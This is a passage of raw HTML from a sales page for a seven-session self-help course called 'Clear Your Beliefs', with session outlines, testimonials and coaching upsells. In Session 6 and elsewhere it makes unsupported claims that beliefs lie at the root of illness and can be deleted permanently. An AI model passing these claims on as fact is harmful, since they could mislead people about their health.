(which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" 